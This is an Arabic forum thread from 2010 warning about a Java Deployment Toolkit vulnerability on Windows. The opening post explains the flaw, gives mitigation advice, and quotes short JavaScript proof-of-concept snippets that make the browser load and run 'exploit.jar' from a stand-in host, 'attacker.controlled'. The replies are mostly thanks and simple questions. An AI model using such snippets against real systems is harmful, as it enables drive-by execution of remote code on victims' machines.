ط§ظ„ط¨ظ‚ط§ط، ظ…ط³ط¬ظ„ ط¯ط§ط¦ظ…ط¢
ط§ظ„ط¥ط¹ظ„ط§ظ†ط§طھ
قديم 16-05-2010, 02:59 PM   #1

NeT^DeV!L
عضو مميز



الصورة الرمزية NeT^DeV!L


• الانـتـسـاب » Jan 2009
• رقـم العـضـويـة » 48244
• المشـــاركـات » 970
• الـدولـة » ام الْدُّنْيَا ... مِصْر
• الـهـوايـة » صَمَّامُ الْامَانُ
• اسـم الـسـيـرفـر »
• الـجـنـس »
• نقـاط التقييم » 10
NeT^DeV!L صـاعـد

NeT^DeV!L غير متواجد حالياً



ثغرة خطيرة في java تهدد مستخدمي ويندوز


بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاتة



اكتشف أحد مهندسي Google ثغرة خطيرة في JAVA موجودة في جميع الاصدارات التي تم اطلاقها بعد Java 6 Update 10. بحسب مكتشف الثغرة Tavis Ormandy والذي قام بنشر تفاصيلها بشكل علني مستخدمي ويندوز بجميع اصداراته معرضين للاختراق عن طريق المتصفّح بغض النظر عن نوعه طالما جافا منصّبة بالجهاز.




تعتبر هذه الثغرة شديدة الخطورة لأنها تعرض جميع اصدارات نظام ويندوز للاختراق عن طريق المتصفّح بكل سهولة وذلك عن طريق توجيه المستخدم لرابط يحتوي على كود يستغل خطأ في Java Deployment Toolkit التي تم اضافتها الى JAVA 6 Update 10 مما يسمح له بتمرير ملف .jar الى Java Web Start (وهي تقنيّة تسمح للمطورين بتشغيل برامجهم المبرمجة بلغة جافا من الانترنت عن طريق بروتوكول JNLP) وتشغيله على جهاز المستخدم.

استغلال هذه الثغرة لا يتعلّق بالمتصفّح حيث يمكن استغلالها على Internet Explorer و Firefox أيضاً في نظام ويندوز. أما أنظمة لينوكس وماك فعلى الأغلب أنها غير مصابة بهذه الثغرة.



كود الاستغلال في متصفّح Internet Explorer سيكون بالشكل:

كود PHP:
var document.createElement("OBJECT");

o.classid "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";

o.launch("http: -J-jar -J\\\\attacker.controlled\\exploit.jar none"); 
أما متصفّح Mozilla Firefox فالكود هو نفسه تقريباً:

كود PHP:
var document.createElement("OBJECT");

o.type "application/npruntime-scriptable-plugin;deploymenttoolkit"

document.body.appendChild(o);

o.launch("http: -J-jar -J\\\\attacker.controlled\\exploit.jar none"); 
التي بدورها ستقوم بتشغيله على النظام. مكتشف الثغرة كتب أنه أبلغ Sun قبل نشرها بشكل علني لكن رد الشركة أتى أن هذه الثغرة ليست خطيرة بما فيه الكفاية ليقوموا بكسر دورة التحديث الخاصة بجافا.

شخصيّاً أجد الثغرة خطيرة جداً لأن Java تعتبر من الأمور الأساسية وموجودة في أغلب الأنظمة والسبب الآخر هو طبيعة هذه الثغرة والثبات الكبير الذي عرفت به جافا! مع اضافة تقنيات جديدة من الطبيعي أن تكتشف ثغرات جديدة ومن مدة بسيطة شركة Oracle أطلقت تحديث لجافا لاصلاح 27 مشاكل أمنية فيها. كما أن هذه الثغرة لا تستغل خطأ في الذاكرة مثلاً أو تحقن شيل كود وبهذه الحالة لا يوجد مشاكل مع تقنيات الحماية مثل ASLR أو DEP لأن الاستغلال مختلف تماماً عن باقي ثغرات المتصفح المعروفة وملف .jar سيعمل على النظام دون أي مشاكل.

مكتشف الثغرة وضع بعض الحلول للحماية منها يمكنكم الاطلاع عليها من الرابط الموجود بالأسفل, شخصيّاً أرى أن الحل الأفضل (والأسهل) هو استخدام Firefox مع اضافة NoScript وبهذه الحالة ستكون قادر على التحكم بشكل كامل بالأمور والسكريبتات التي سيتم تشغيلها على متصفّحك وهذا كفيل لحمايتك من أغلب ثغرات المتصفح وليس هذه الثغرة فقط.

عفوا ,,, لايمكنك مشاهده الروابط لانك غير مسجل لدينا [ للتسجيل اضغط هنا ]
توقيع NeT^DeV!L :
(وَلَقَدْ يَسَّرْنَا الْقُرْآنَ لِلذِّكْرِ فَهَلْ مِن مُّدَّكِرٍ)

رد مع اقتباس
إعلانات google

قديم 19-05-2010, 03:01 PM   #2

amr174747
عضو مميز



الصورة الرمزية amr174747


• الانـتـسـاب » Feb 2010
• رقـم العـضـويـة » 68211
• المشـــاركـات » 918
• الـدولـة »
• الـهـوايـة »
• اسـم الـسـيـرفـر »
• الـجـنـس »
• نقـاط التقييم » 10
amr174747 صـاعـد

amr174747 غير متواجد حالياً


إرسال رسالة عبر Yahoo إلى amr174747

افتراضي


يا رب دايما في القمة

رد مع اقتباس
قديم 23-05-2010, 09:31 PM   #3

goda30
عضو فعال



الصورة الرمزية goda30


• الانـتـسـاب » Dec 2008
• رقـم العـضـويـة » 43539
• المشـــاركـات » 408
• الـدولـة » El Masoura
• الـهـوايـة » SilkRoad
• اسـم الـسـيـرفـر »
• الـجـنـس »
• نقـاط التقييم » 10
goda30 صـاعـد

goda30 غير متواجد حالياً


إرسال رسالة عبر Yahoo إلى goda30

افتراضي


مشكور على النصيحة
توقيع goda30 :
Demon
!dream! was missing
were so scared
but no one would listen
cause no one else cared
after my dreaming
! woke with this fear
what am ! leaving
when i'm done here
so if you asking me ! want you to know
when my time comes torget the wrong that i've done
help me leave beind some reasons to be missed
Don't resent me and when your feeling empty
keep me in your memory
leave out all the rest
leave out all the rest
Don't be afraid
!'ve taken my beating

رد مع اقتباس
قديم 25-05-2010, 10:49 PM   #4

DarK_AnGeL
عضو مشارك



الصورة الرمزية DarK_AnGeL


• الانـتـسـاب » Sep 2007
• رقـم العـضـويـة » 1876
• المشـــاركـات » 5,762
• الـدولـة » My Own World
• الـهـوايـة » Sro- Internet-FootBall
• اسـم الـسـيـرفـر » No Server
• الـجـنـس » Male
• نقـاط التقييم » 10
DarK_AnGeL صـاعـد

DarK_AnGeL غير متواجد حالياً


إرسال رسالة عبر Yahoo إلى DarK_AnGeL

افتراضي


الناس بتكبر وتخيب :d
توقيع DarK_AnGeL :

رد مع اقتباس
قديم 31-05-2010, 10:48 PM   #5

_Zemos_
عضو فعال





• الانـتـسـاب » Feb 2010
• رقـم العـضـويـة » 68868
• المشـــاركـات » 251
• الـدولـة » Cairo/Elshorouk City
• الـهـوايـة » Silkroad :)
• اسـم الـسـيـرفـر »
• الـجـنـس »
• نقـاط التقييم » 10
_Zemos_ صـاعـد

_Zemos_ غير متواجد حالياً


إرسال رسالة عبر Yahoo إلى _Zemos_

افتراضي


شكرا للتنبيه
توقيع _Zemos_ :

رد مع اقتباس
قديم 17-06-2010, 10:55 PM   #6

Xx_Naruto_xX
عضو فعال



الصورة الرمزية Xx_Naruto_xX


• الانـتـسـاب » Jun 2010
• رقـم العـضـويـة » 71369
• المشـــاركـات » 339
• الـدولـة »
• الـهـوايـة »
• اسـم الـسـيـرفـر »
• الـجـنـس »
• نقـاط التقييم » 10
Xx_Naruto_xX صـاعـد

Xx_Naruto_xX غير متواجد حالياً



افتراضي


شكرا للتنبية
توقيع Xx_Naruto_xX :


سيقل تواجدى او سينقطع تماما بسبب الثانويه العامه ادعولى

رد مع اقتباس
قديم 23-06-2010, 05:42 PM   #7

Jiraya Sama
عضو فضى



الصورة الرمزية Jiraya Sama


• الانـتـسـاب » Sep 2009
• رقـم العـضـويـة » 64141
• المشـــاركـات » 3,012
• الـدولـة » The Hidden Leaf Konoha
• الـهـوايـة » online games
• اسـم الـسـيـرفـر »
• الـجـنـس »
• نقـاط التقييم » 14
Jiraya Sama صـاعـد

Jiraya Sama غير متواجد حالياً


إرسال رسالة عبر Yahoo إلى Jiraya Sama

افتراضي


يعنى احنا معرضين للاختراق فى اى وقت o.o

رد مع اقتباس
قديم 03-07-2010, 01:13 PM   #8

hill_dorgon
عضو لامع



الصورة الرمزية hill_dorgon


• الانـتـسـاب » Jan 2009
• رقـم العـضـويـة » 47364
• المشـــاركـات » 1,122
• الـدولـة »
• الـهـوايـة »
• اسـم الـسـيـرفـر »
• الـجـنـس »
• نقـاط التقييم » 10
hill_dorgon صـاعـد

hill_dorgon غير متواجد حالياً



افتراضي


اى ده بس انتا عرفت منين
توقيع hill_dorgon :


انشاء الله ناوى على شر

رد مع اقتباس
قديم 29-07-2010, 04:39 AM   #9

QeRa
عضو سوبر



الصورة الرمزية QeRa


• الانـتـسـاب » Jul 2009
• رقـم العـضـويـة » 63295
• المشـــاركـات » 2,227
• الـدولـة » مصر \ القاهرة
• الـهـوايـة » كرة القدم
• اسـم الـسـيـرفـر »
• الـجـنـس »
• نقـاط التقييم » 10
QeRa صـاعـد

QeRa غير متواجد حالياً


إرسال رسالة عبر Yahoo إلى QeRa

افتراضي


مشكور


توقيع QeRa :
عفوا ,,, لايمكنك مشاهده الروابط لانك غير مسجل لدينا [ للتسجيل اضغط هنا ]
Story's Going On Forever <3
Yes We The Real Lengend

رد مع اقتباس
قديم 06-08-2010, 03:02 PM   #10

iMido
عضو متألق



الصورة الرمزية iMido


• الانـتـسـاب » Mar 2009
• رقـم العـضـويـة » 58256
• المشـــاركـات » 1,660
• الـدولـة » North Sinai
• الـهـوايـة » Writing code, Swimming, Flying
• اسـم الـسـيـرفـر » No Server
• الـجـنـس » Male
• نقـاط التقييم » 13
iMido صـاعـد

iMido غير متواجد حالياً


إرسال رسالة عبر Yahoo إلى iMido

افتراضي


طب ايه الحل

رد مع اقتباس
قديم 07-08-2010, 01:09 AM   #11

blacksea2010
عضو فعال



الصورة الرمزية blacksea2010


• الانـتـسـاب » Feb 2009
• رقـم العـضـويـة » 49413
• المشـــاركـات » 334
• الـدولـة » بورسعيد
• الـهـوايـة »
• اسـم الـسـيـرفـر »
• الـجـنـس »
• نقـاط التقييم » 10
blacksea2010 صـاعـد

blacksea2010 غير متواجد حالياً



افتراضي


tyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy

رد مع اقتباس
قديم 09-08-2010, 04:45 AM   #12

BonBony
عضو ذهبى



الصورة الرمزية BonBony


• الانـتـسـاب » Jun 2009
• رقـم العـضـويـة » 62469
• المشـــاركـات » 4,673
• الـدولـة »
• الـهـوايـة »
• اسـم الـسـيـرفـر »
• الـجـنـس » Male
• نقـاط التقييم » 10
BonBony صـاعـد

BonBony غير متواجد حالياً



افتراضي


طــب كدة ممكــن يختــرق الــ Cokies و يســرق ال Data ؟
توقيع BonBony :


Closed#

رد مع اقتباس
قديم 30-08-2010, 06:15 PM   #13

7amomagzara
عضو مميز



الصورة الرمزية 7amomagzara


• الانـتـسـاب » Aug 2010
• رقـم العـضـويـة » 72716
• المشـــاركـات » 595
• الـدولـة » ĂľễЖaήĎЯĺà
• الـهـوايـة »
• اسـم الـسـيـرفـر »
• الـجـنـس »
• نقـاط التقييم » 10
7amomagzara صـاعـد

7amomagzara غير متواجد حالياً



افتراضي


مشكور

رد مع اقتباس
قديم 01-09-2010, 10:59 AM   #14

WadCool
كبار الشخصيات



الصورة الرمزية WadCool


• الانـتـسـاب » Feb 2008
• رقـم العـضـويـة » 12818
• المشـــاركـات » 8,381
• الـدولـة » OCTOBER 6th
• الـهـوايـة » Graduate from Pharmacy Coleage
• اسـم الـسـيـرفـر » Private Server
• الـجـنـس » Male
• نقـاط التقييم » 65
WadCool جـيـد

WadCool غير متواجد حالياً


إرسال رسالة عبر Yahoo إلى WadCool

افتراضي


شكرا علي المعلومة ومجهود رائع منك فعلا :)
توقيع WadCool :
--------------------

لآ مانع من وجُود مَن يكرهُني !!
فـهـ‘ـذه مُشكِلتَهُم , ولَيست مشكلتي !!!!!.

وليس عليّ أن أجتهد للحُصـول على .... حبهم
فـلســــتُ مُلزَم أنْ : أشكّل نفسي وفـــــــق أهواء النـاس...

إن أعجبتهم فهذا : طًبعي
وإن لم أعُجبــــــهم فـ كَثيــــــرةٌ هي : الجدران
وإن تَحدثوا عني ,أتمنى أن لآ يَسكتوا
فـَ.. كُل إنسانِ لهُ ذُنوب.

--------------------


رد مع اقتباس
قديم 01-09-2010, 11:07 AM   #15

Maher901
عضو فعال



الصورة الرمزية Maher901


• الانـتـسـاب » Jun 2009
• رقـم العـضـويـة » 61074
• المشـــاركـات » 317
• الـدولـة » السـ3ـودية
• الـهـوايـة »
• اسـم الـسـيـرفـر »
• الـجـنـس »
• نقـاط التقييم » 10
Maher901 صـاعـد

Maher901 غير متواجد حالياً



افتراضي


ك،ـــدآآ !
توقيع Maher901 :


MeMo_wizz سآبقآ

رد مع اقتباس
إضافة رد
صفحة 1 من 2 1 2

« الموضوع السابق | الموضوع التالي »

يتصفح الموضوع حالياً : 1 (0 عضو و 1 زائر)
 
أدوات الموضوع
انواع عرض الموضوع
العرض العادي العرض العادي

ضوابط المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك
BB code متاحة
كود [IMG] متاحة
كود HTML معطلة
الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى الردود آخر مشاركة
باي بال تصلح ثغرة أمنية خطيرة في أحد تطبيقات آيفون WildThing بـعـيـدآ عـن سـيـلـك رود 14 29-12-2010 08:27 PM


الساعة الآن 07:13 AM.

الاتصال بنا - الأرشيف - بيان الخصوصية - الأعلى